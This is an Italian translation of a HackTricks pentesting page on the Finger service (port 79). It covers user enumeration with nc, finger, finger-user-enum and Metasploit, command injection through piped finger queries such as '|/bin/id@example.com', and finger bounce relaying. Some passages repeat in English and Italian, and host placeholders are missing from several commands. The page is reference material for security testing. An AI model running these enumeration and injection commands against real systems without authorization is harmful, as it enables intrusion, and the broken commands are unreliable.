# 79 - Pentesting Finger
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)! Altri modi per supportare HackTricks: * Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) * Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT**](https://opensea.io/collection/the-peass-family) esclusivi * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## **Informazioni di base** Il programma/servizio **Finger** viene utilizzato per recuperare informazioni sugli utenti di un computer. Tipicamente, le informazioni fornite includono il **nome utente di accesso, il nome completo** e, in alcuni casi, ulteriori dettagli. Questi dettagli aggiuntivi potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibili), l'ora di accesso dell'utente, il periodo di inattività (tempo di inattività), l'ultima volta che l'utente ha letto la posta elettronica e il contenuto dei file di piano e progetto dell'utente. **Porta predefinita:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumerazione** ### **Rilevamento del banner/Connessione di base** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Enumerazione degli utenti** User enumeration is the process of gathering information about valid user accounts on a target system. This information can be used by an attacker to gain unauthorized access to the system. La enumerazione degli utenti è il processo di raccolta di informazioni sugli account utente validi su un sistema di destinazione. Queste informazioni possono essere utilizzate da un attaccante per ottenere accesso non autorizzato al sistema. #### **Finger service** The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. It is commonly used to obtain information such as the username, full name, and other details of a user. Il servizio Finger è un protocollo di rete che consente agli utenti di recuperare informazioni su altri utenti su un sistema remoto. È comunemente utilizzato per ottenere informazioni come il nome utente, il nome completo e altri dettagli di un utente. #### **Finger enumeration** Finger enumeration is a technique used to gather information about users on a target system using the Finger service. By querying the Finger service with different usernames, an attacker can determine which usernames are valid on the system. L'enumerazione Finger è una tecnica utilizzata per raccogliere informazioni sugli utenti su un sistema di destinazione utilizzando il servizio Finger. Interrogando il servizio Finger con diversi nomi utente, un attaccante può determinare quali nomi utente sono validi nel sistema. #### **Tools for Finger enumeration** There are several tools available for performing Finger enumeration, such as `finger`, `finger-user-enum`, and `enum4linux`. These tools automate the process of querying the Finger service with different usernames and provide the results in a readable format. Ci sono diversi strumenti disponibili per eseguire l'enumerazione Finger, come `finger`, `finger-user-enum` e `enum4linux`. Questi strumenti automatizzano il processo di interrogazione del servizio Finger con diversi nomi utente e forniscono i risultati in un formato leggibile. #### **Countermeasures** To protect against Finger enumeration attacks, it is recommended to disable or restrict the Finger service on the target system. Additionally, implementing strong password policies and regularly monitoring user accounts can help prevent unauthorized access. Per proteggersi dagli attacchi di enumerazione Finger, si consiglia di disabilitare o limitare il servizio Finger sul sistema di destinazione. Inoltre, l'implementazione di politiche di password robuste e il monitoraggio regolare degli account utente possono contribuire a prevenire l'accesso non autorizzato. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` In alternativa, è possibile utilizzare **finger-user-enum** da [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), alcuni esempi: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap esegue uno script per fare l'utilizzo degli script predefiniti** ### Metasploit utilizza più trucchi rispetto a Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Esecuzione di comandi ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Utilizzare un sistema come un relay per il finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)! Altri modi per supportare HackTricks: * Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) * Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family) * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Condividi i tuoi trucchi di hacking inviando PR ai repository github di** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).